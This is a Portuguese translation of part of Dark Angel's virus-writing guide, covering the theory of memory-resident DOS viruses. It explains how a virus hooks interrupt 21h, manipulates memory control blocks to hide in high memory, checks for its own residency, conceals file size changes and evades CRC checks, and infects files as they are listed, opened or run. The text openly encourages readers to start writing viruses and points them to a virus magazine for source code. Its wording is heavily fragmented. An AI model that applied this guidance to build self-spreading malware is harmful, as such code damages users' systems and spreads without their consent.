eh  tambem feito pela Borland, o rei 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senvolvimento d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erramentas.  Turbo Debugger tem muito aspectos que você po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penas precisar comprar ele par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sim  voce poder ler o  manual!  Ele pode enganar muitas armadilh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a debuggers co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acilidade e é ideal para testar.  Adicionalmente, esse debugador te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ersões 286 e 386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pecíficas,  cada uma das quais muito mais poderosas que o seu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nteriore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4.   Nao use MOV ao invés de LE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Quando escrever seu primeiro vírus, você pode muitas veze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quecer de usar LEA ao invez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MOV quando for carregar  offsets.  Esse eh um serio engano e eh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uitas vezes feito pelo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dificadores de vírus iniciantes.   Os efeitos prejudiciais efeitos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al erro sã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mediatamente óbvias.  Se o vírus não está trabalhando, cheque po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se erro.  É quase tã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ifícil de detectar quanto um erro de apontador NULO em C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5.   Leia as últimas edições de 40Hex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40Hex, jornal oficial do PHALCON/SKISM com técnicas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irus tecnicas e novidades, é um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cação que não pode ser perdido por nenhum criador de víru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m respeito próprio.  Cad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dição contém técnicas e código fonte, desenvolvido para ajuda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odos os escritores de vírus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jam eles iniciantes ou experts.  Novidades relacionadas a Víru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ambém é publicado.  Pegu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 jornal, leia o jornal, ame o jornal, coma o jornal!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O QUE AGORA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Você tem todo o codigo e informação suficiente para escrever u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írus viável, tão bem quant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 técnicas saudáveis para usar.  Assim, pare de ler e comece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crever!  A única forma d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icar melhor é através da prática.  Depois de duas ou três tentativas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ocê deverá estar n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aminho da criação do seu próprio vírus bom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VISO: Esse arquivo tem garantia de 100% de continuar a existir. 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utor não clama a existencia ou nao existencia do leitor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se espaco foi deixado intencionalmente em branc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GRADECIMENTOS: Bemvindo ao lar, Hellraiser!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la para a turma: Count Zero, Demogorgon, Garbageheap, assi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mo para todo o resto que eu não mencionei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Guia de Criação de Vírus por Dark Angel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"Isso é legal!" - Kraft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NDE ENCONTRAR:  Para encontrar esse guia e as futura ediçõe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á para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http://lebeau.home.ml.org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CASO DE DÚVIDAS: rlebeau@geocities.com (Não sou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utor mas manjo u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ouco de Assembly, portanto eu poderei não saber responder todas a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estões)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PARTE IV: VÍRUS RESIDENTE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VIRUS, PARTE II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Agora que o topico de virus nao residentes foi endereçado, es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érie agora vira-se para virus residente em memória.  Essa parte cobr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teoria desse tipo  de virus,  entretanto nenhum codigo irá se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esentado.  Com  esse conhecimento em  mão, voce pode escreve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rus residente em memoria com a certeza que voce não está in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uito mal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INTERRUPÇÕE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DOS amavelmente fornece-nos um poderoso metodo de valorizar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i mesmo, chamado programas residente em memória.  Program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idente em memória permite uma extensão e alteração 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uncionamento normal do DOS.  Para entender como program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idente em memoria funcionam, é necessário desenvolver dentro d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tricacias da tabela de interrupções.   A tabela de interrupções é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ocalizada na localizacao de memória 0000:0000h até  0000:0400h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ou  0040:0000), apenas  abaixo da área de informação da BIOS.  El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ste de 256 double words, cada uma representando um par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gmento:offset.   Quando uma chamada de interrupcao é instruid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ia uma instrucao INT, duas coisas ocorrem, nessa ordem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1) Os flags sao empurradas dentro da pilh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2) Um  far call é instruida  para o segmento:offset localizada n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abela de interrupçõ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Para retornar de uma interrupção, uma iret instrucao eh usada. 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rução iret reversa a ordem da chamada int.  Isso  executa um retf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guido por um popf.  Esse procedimento de chamada/retorno te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m interessante contra-efeito quando considerando manuseadores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terrupções que retorna valores no registrador de flags.   Tai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anuseadores deve manipula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iretamente o registrador de flags salva na pilha antes do qu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implesmente manipular diretamente o registrador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O processador procura na tabela de interrupcao a localizacao pa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der chamar.  Por exemplo, quando uma interrupcao  21h eh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hamada, o processador procura na tabela interrupcao para encontra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endereco do handler da interrupcao 21h.  O segmento des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ontador eh 0000h e o offset eh 21h*4, ou 84h.  Em outras palavras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tablea de interrupcao é simplesmente um consecutivo corrente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56 ponteiros para interrupcoes, indo de interrupcao 0 pa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terrupcao 255.  Para encontrar uma específica interrupção handlerr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rregue em um segmento par de double word segmento:offset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tir do segmento 0, offset  (interrupcao numero)*4.  A tabela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terrupcao eh armazenado em formato padrao Intel reverso doubl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word, i.e. o offset eh armazenado primeiro, seguido pelo segment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Para um  programa poder "capturar" uma interrupcao, ou seja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direcionar a interrupcao, ele deve mudar os dados na tabela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terrupcao.  Isso pode ser realizado tanto por manipulação direta d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abela ou por uma chamada para a apropriada função DOS.  Se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grama manipula a tabela diretamente, ele deve por esse codig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ntre um par CLI/STI, para instruir uma interrupcao pelo processado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quanto o tabela eh semi-alterada pode ter pessimas consequencia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Geralment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anipulação direta é a alternativa preferível, desde que algun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gramas primitivos tal como FluShot+ captura a chamada pa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terrupcao 21h para mudar a interrupcao e ira avisar o usuario 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alquer programa "nao autorizado" tentar mudar o handler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Um controlador de interrupção eh uma peça de codigo que eh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ecutada quando uma interrupcao eh requerida.  A interrupcao po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anto ser requerido por um programa ou pode ser requerida pelo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cessador.  Interrupcao 21h eh  um exemplo do anterior, enquan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terrupcao 8h eh uma exemplo da outra.  O sistema BIOS fornec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ma porcao de handlers de interrupção, com DOS e outros program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ornecendo o resto.  Geralmente, o limite de interrupções BIOS vari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 0h par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Fh, em interrupcoes DOS o limite é de limite de 20h até 2Fh, e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sto eh disponivel para uso pelos programa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Quando um  programa deseja  instalar seu proprio codigo, ele dev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r muitos fatores. Primeiro de todos, ele quer suplantar ou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crescentar existinte codigo, tem que ver, já tem um handler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terrupcao presente?  Em segundo lugar, o programa desej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servar o funcionamento do handler de interrupcao antigo?  Po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emplo, um programa que "captura"  a interrupção do tick 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lógio do BIOS podera definitivamente desejar preservar o antig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handler de interrupca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gnorando a presenca do velho handler de interrupcao pode levar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isastrosos resultados, especialmente se programas residente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arregados anteriormente capturaram essa interrupca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Uma tecnica  usada em  muitos handlers de interrupcao eh chamad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"chaining."  Com chaining,  tanto o novo e o velho handler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terrupcao são executados.  Há dois métodos primario para chaining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execucao e posexecucao.  Com reexecucao,  o velho  handler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terrupcao eh chamado antes do novo.  Isso eh realizado via um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hamada pseudo-INT consistindo de um pushf seguido por um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hamada longe ptr.  O novo handler de interrupcao passa o control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ando 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elho termina.  Preexecucao chaining eh usada quando o novo handle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interrupcao deseja para usar o resultados do antigo handler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terrupcao em decidir a ação apropriada para pegar.  Posexecuca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haining eh mais arrumado, simplesmente  consistindo de um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rucao jmp far ptr.  Esse metodo nao requer uma instrucao iret pa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r localizada no novo handler de interrupcao!  Quando o jmp eh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ecutado, o novo handler de interrupcao completou suas ações e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trole eh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ssado para o velho handler de interrupcao.   Esse metodo  eh usa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imariamente quando um programa deseja interceptar a chamada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terrupcao antes do DOS ou BIOS para pegar um chance pa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ocessar ele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UMA INTRODUÇÃO PARA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LOCAÇÃO DE MEMÓRIA NO D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Alocação de memória eh talvez um dos conceitos mais dificeiss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rtamente o mais dificil para implementar, no DOS.  O problema é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e não há muita documentacao a respeito tanto pela Microsoft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anto pela IBM.  Infelizmente, conhecimento de gerenciar memóri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o DOS é crucial em escrever vírus residente na memóri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Quando um  programa pede ao DOS por mais memoria, o sistem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peracional esculpe um pedaço de memoria do um lugar que nã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nha memória alocada.  Embora esse conceito eh simples sufici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entender, é necessário ir fundo em ordem de ter sufici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hecimento para escrever vírus residente em memória efetiv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OS cria blocos de controle de memória controle blocos (MCBs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a ajudar a si mesmo manter rastros desses pedacos de memori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CBs sao pequenas areas de memoria que cada uma é devotada pa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anter rastros de uma área particular da memória alocada.  Quan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m programa solicita memória, um paragrafo para o  MCB eh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locado em adicao para a memoria requerida pelo programa.   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CB falha apenas em fronte da memoria que ele controla.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isualmente,  um MCB e sua memoria parece assim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+-------------------------------------------------------+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| MCB 1 | pedaço de memoria controlado pelo MCB 1 |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+-------------------------------------------------------+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Quando uma segunda secao de memoria eh requerida,  outro MCB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h criado logo abaixo da última memória alocada.  Visualmente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+-----------------------------------------+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| MCB 1 | Pedaço 1 | MCB 2 | Pedaço 2  |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+-----------------------------------------+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Em outro  palavras, os MCBs sao "empilhados" um em cima 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utro.  ocorre uma perda de espaço quando for desalocar MCB 1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tes de MCB 2, aparecendo buracos no desenvolvimento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emória.  A estrutura para o MCB eh como segue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Offset    Tamanho   Significand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------    -------      ------------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0           BYTE       'M' ou 'Z'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1          WORD      Processo ID (PSP do dono do bloco)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3          WORD      Tamanho em paragrafo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5         3 BYTES    Reservados (Nao usado)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8         8 BYTES    DOS 4+ usa esse.  Yay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Se o  byte em  offset 0 eh 'M', entao o MCB não é o fim d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rrente.  O 'Z' denota o fim do MCB corrente.  Pode ser mais do qu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m MCB presente na memoria por vez e esse "aspecto" eh usa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elos virus para ir residente na memória alta.  O word em offset 1 eh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rmalmente igual ao PSP do dono do MCB.  Se ele eh  0, iss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ignifica que o bloco eh livre e eh disponivel para usar pel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gramas.  Um valor de 0008h nesse campo denota DOS como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ono do bloco.  O valor e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ffset 3 NAO inclui o paragrafo alocado para o  MCB.  Ele reflete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alor passado para as funções de alocação do DOS.  Todos os camp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ocalizados depois do tamanho do bloco não tem utilidade e voc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ode ignorar ele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Quando um arquivo COM eh carregado, todas a memóri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isponivel eh alocado para ele pelo DOS.  Quando um arquivo EX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h carregado, a quantidade de memoria especificada no cabeçalho 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rquivo EXE eh alocada.   Tem tanto um valor minimo e um maxim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 cabecalho.  Geralmente, o linkador ira mudar o maximo valor pa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FFFh.  Se o programa deseja alocar memoria, ele deve primeir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ncolher o principal  pedaço de memoria pertencente pelo  program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o minimo requerido. De outro modo, a tentativa patético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locação de memoria ira falhar miseravelmente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Uma vez que programas normalmente não supostos para manipula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CBs diretamente, o controlador da memória do DOS chama  (48h -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Ah) para retornar e aceitar valores do primeiro paragrafo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emória usável do programa,  ou seja,  o paragrafo de memori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mediatamente depois do MCB.  É importante manter isso em  m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ando escrever código manipulador de MCB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MÉTODOS DE FICAR RESID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Tem uma variedade de estratégias sobre residência em memoria. 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imeira eh o uso das rotinas TSR em interrupção do D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adicional,  tanto INT 27h ou INT 21h/Funcao 31h.  Essas rotin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ao indesejaveis quando escrever virus, porque eles nao retornam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trole para o programa depois da execucao.  Adicionalmente, ele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arecem como "andarilhos na memória" em programas como PMAP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 MAPMEM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A alternativa viral tradicional para usar a interrupção do DOS eh, é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laro, escrever uma nova rotina de residencia.  Quase todo víru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oderno usa uma rotina para "carregar na memória alta," ou seja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carrega si mesmo dentro da maior localização de memóri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ssivel.  Por exemplo, em um sistema com 640K, o virus pode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rregar a si mesmo apenas dentro dos 640K mas acima da are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ervada pelos DOS para uso dos programas.   Embora isso é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ecnicamente nao a área mai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lta na memoria, ele deve ser referido como tal em um remanesc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esse arquivo em ordem de acrescentar confusao e caos geral dentr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outros arquivos.  Carregar na memória alta pode ser facilm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alizado atraves de uma serie de chamadas de interrupcoes através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alocacao e alocacao.  O método geral eh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1.   Encontrar o tamanho da memóri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2.   Encolher a memória do programa para o total de memoria -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amanho do viru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3.   Alocar memoria para o virus (esse ira ser na área de memori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lta)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4.   Mudar o MCB do programa para o fim da corrente (Marque el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m 'Z')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5.   Copiar o virus para a memória alt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6.   Salve os vetores de interrupcao antigo se o virus desej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correntar vetore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7.   Mudar os vetores de interrupcao para a localização apropriada n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emória alt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Quando calcular tamanhos de memoria, lembre que todos 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amanhos estao em paragrafos. O MCB deve tambem ser considerado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o ele pega mais de um paragrafo de memoria.  A vantagem des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etodo eh que ele não faz, como um regra, aparecer como u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darilho de memória. Entretanto, o total de memória do sistem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ostrado por alguns programas como MEM irá decrementar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Uma terceira alternativa eh nao alocar tudo.  Alguns virus copia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i mesmo para a memoria dentro dos 640K, mas falha para alocar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emoria.  Isso pode ter conseqüências desastrosas, como qualque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grama carregado pelos DOS pode possivelmente usar ess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emoria.  Se isso esta corrompido, resultados imprevisiveis pode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correr.  Embora nenhuma perda de memória eh mostrada pel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EM,  o possivel caos resultante desse metodo eh claramente na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ceitavel.  Alguns viru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sam memoria livre.  Por exemplo, a parte superior da tabela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terrupcao ou partes e memória de video tudos pode ser usado co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lguma seguranca que a memoria não irá ser corrompido.  Uma vez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novo, essa tecnica eh tanto indesejavel como é extremam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stavel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Este tecnicas não sao os únicos metodos de residencia. Eu tenh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sto alguns metodos bizarrosde ficar residente nos buffers de disc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ternos do  DOS.  Onde ha memoria, ha um mod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É muito desejavel saber se o virus já é residente.  O modo mai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imples de fazer isso eh escrever função de checagem funcao n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ódigo do handler da interrupção.  Por exemplo, uma chamada para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terrupcao 21h com o registrador ax em 7823h pode retornar u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alor 4323h em ax,  significando residencia.  Quando usar es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hecagem,  é importante garantir que nao tenha possíveis conflit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m os outros programas ou com o próprio DO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POR QUE RESIDENTE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Vírus residente em memoria tem muitos vantagens distinguivei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obre virus runtime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Tamanh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Virus residente em memória sao muitas vezes menores do que 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írus runtime uma vez que  eles nao precisam incluir codigo pa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ocurar por arquivos para infectar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Efetividad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Eles sao muitas vezes mais virulentos, uma vez que ate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ando DIR "infectado."  Geralmente, a tecnica padrao eh cad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quivo que é executado enquanto o virus está residente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Velocidad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Vírus runtime infectam antes de um arquivo ser executado.  U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rus pobre ou um grande vírus runtime irá causar um noticiavel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mpo de espera antes da execucao facilmente observado pel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suarios.   Adicionalmente,  isso causa uma grande atividade no disc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e é detrimental para a espalhação do viru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Camuflagem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O manipulacao  de  interrupcoes  permite  por  o  implementaca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 camuflagem tecnicas,  tal como  o escondendo de mudancas e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rquivo tamanho em diretorio listagens e em-o-voo desinfecca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ssim eh maisdifícil para o usuário médio  detectar o viru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dicionalmente, o vírus astuto  pode ate se esconder da checagem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RC, obliterando assim, as técnicas de detecção de anti-viru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ESTRUTURA DO VÍRUS RESID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Com a informação preliminar fora do caminho,  a discussao po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gora passar para mais virus-relacionado, certamente  com mai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ópicos interessantes.  A estrutura do vírus residente em memoria eh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adicalmente diferente do que do vírus runtime.  Isso simplesm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ste de um curto pedaço de programa usado para determinar se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rus ja é residente.  Se ele ainda não está na memoria, o códig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rrega ele na memoria atraves de qualquer metodo.  Finalmente,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edaço de código restaura o controle para o programa servidor. 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to do codigo do vírus residente consiste de handlers de interrupca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nde o resto do trabalho eh feit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O pedaço de código eh apenas a porção do virus que precisa ter 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lculos do offset delta. O handler da interrupcao idealmente i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istir em um localizacao que não ira requerer tais fixaçõe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undanas.  Uma vez carregado, não deve mais haver uso do offset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lta, como a localização das variaveis eh preset.  Desde que o códig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o vírus residente virus deve originar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offset 0 do bloco de memória, o código original deve estar n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ffset 0.  Não inclua um jmp para o código virus no carregado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iginal do arquivo.  Quando mover o virus para a memoria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implesmente mova o inicio para [bp+startvirus]  e os offsets deve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abalhar fora quando ele estão no arquivo fonte.  Isso simplifica (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curta) o codigo do handler da interrupca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Muitos coisas devem ser consideradas em escrever os handlers d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terrupcao para um virus.  Primeiro, o  virus deve preservar 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gistradores.  Se o virus usa preexecucao chaining, ele deve salvar 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gistradores depois de chamar o handler original.  Se o virus us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sexecucao chaining, ele deve restaurar os registradores originais d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hamada de interrupcao antes do call para o handler original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gundo, isso eh mais dificil, embora nao impossivel, pa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mplementar a encriptacao com vírus residente em memória.  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blema é que se o handler da interrupcao eh encriptado, então es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andler da interrupcao controlador não pode ser chamado antes d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unção de decriptacao.  Isso pode ser um grande desgosto para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essoa.  O modo mais fácil é simplesmente  nao incluir encriptaca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u prefero modo facil.   Os leitores que preferem o modo não-fácil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dem  desejar  que a memoria simultaneamente mantenha du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pias do virus, encriptar a cópia cópia não usada, e usa a cópi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ncriptada como o buffer de escrita. É claro, o vírus pode então pega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uas vezes a quantidade de memoria que ele pode requere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rmalmente.  O uso de encriptacao eh um problema de escolh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essoal e facilidade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Outro fator importante para considerar quando escrever handler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interrupcao, especialmente aqueles de interrupções de BIOS, eh u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edaço do DOS com reentrancia.  Isso significa que funções D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uncoes nao podem ser executadas enquanto DOS está no meio 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cessamento de um requerimento de interrupcao.  Isso acontec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rque DOS configura sobre o mesmo apontador de pilha cada vez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e ele eh chamado, e chamando a segunda interrupção DOS que i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ausar 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cessamento de um código para sobreescrever a pilha do outro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usando resultados inprevisíveis, mas muitas vezes terminal.  Iss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lica-se indiferente de que interrupções do DOS sao chamadas, m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sso eh especialmente verdadeiro para a interrupcao 21h, desde qu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le tente muitas vezes para usar ele de dentro de um handler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terrupcao. A menos que ele esteja certo que o DOS não está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cessando um requerimento anterior, NÃO faça uso de uma funçã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o DOS no handler da interrupcao.  Isso eh possivel para usar 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"mais baixas" funções da interrupcao 21h sem  medo de corromper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ilha, mas eles sao basicamente sem utilidade, realizar funcoe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acilmente  acessado pela chamada da BIOS chama ou acesso diret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o hardware.  Essa discussão inteira apenas aplica para captura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terrupções nao-DOS.  Ao capturar interrupções do DOS vem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guranca que DOS não está executando em qualquer outro lugar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ma vez que isso podera entao estar corrompendo sua própria pilha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e podera ser a ocorrência mais infeliz de fat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A interrupção mais comum para capturar eh, naturalmente,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terrupcao 21h.  A Interrupcao 21h eh chamada por todo program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OS.  A estratégia usual eh por um virus para encontrar potenciai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rquivos para infectar ao interceptar certas chamadas DOS. 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unções primárias para capturar incluem o find first, find next, aberto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 comandos de executar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o usar pre e  posexecucao chaining,  um virus pode facilm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ncontrar o arquivo que foi encontrado, aberto, ou executado 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fectar ele.  Os truque é simplesmente encontra o método apropria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isolar o nome do arquivo.  Uma vez que isso é feito, o resto é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sencial idêntico para o vírus runtime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Quando chamar interrupcoes capturadas pelo código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terrupção, tenha certeza que o virus não capture esse call e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ticular,  para que nao resulte em um infinito loop.  Por exemplo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 a função de executar funcao eh capturada e o virus  deseja, po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lguma razao, executar um particular arquivo usando essa funcao, el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ÃO deve usar um  simples "int  21h" para fazer o trabalho.  E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sos tais como esse onde o problema não pode ser evitado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implesmente simule a chamada para a interrupcao com um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mbinação de pushf/call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A estrutura básica do handler da interrupcao eh completam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imples.  O controlador primeiro mostra os registradores para cad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hamada de identificacao ou para um função capturada funcao tal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o executar.  Se ele não for um dos mostrado acima, o handler irá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jogar o controle de volta para o handler original da interrupcao.  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sso eh um requerimento de identificacao, o handler simplesm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figura os registradores apropriados e retorna  para o programa qu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hamou.  De outro forma, o virus deve decidir se as chamadas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querimento é para pre ou posexecucao chaining.  Indiferente de qual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le usa,  o virus deve encontrar o nome do arquivo e usar es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formacao para infectar.  O nome do arquivo pode ser encontra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anto atraves do uso de registradores como ponteiros ou procurand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traves de certas estrutura de dados, tal como FCBs.  A rotin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fecção eh a mesma como aquela para vírus nao residentes, com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xcecao daquilo mostrado nos parágrafos anteriores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O QUE ESTÁ POR VIR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Eu apologiso por algumas sentenças criticas usadas no guia, m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u sou um programador, nao um escritor.  Minha única sugestao eh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ler tudo sobre o assunto ate ele fazer sentido.  Eu decidi faze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sa edicao do guia com teoria antes do codigo.  Na proxima parte, eu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rei apresentar todo o codigo necessario para escrever um víru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idente em memoria, ao longo de algumas tecnicas que podem se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sadas.  Mais toda a informacao necessaria para escrever um víru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idente irá ser incluida nessa edição; é apenas um problema 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mplementação.  Tenha bytes de diversão!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21:40:00Z</dcterms:created>
  <dc:creator>Cortesia</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Fabio Alexandre de Magalhães</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2000-06-07T16:27:00Z</dcterms:modified>
  <cp:revision>3</cp:revision>
  <dc:subject/>
  <dc:title>AVISO: O autor não se responsabiliza pelo mau uso desse texto</dc:title>
</cp:coreProperties>
</file>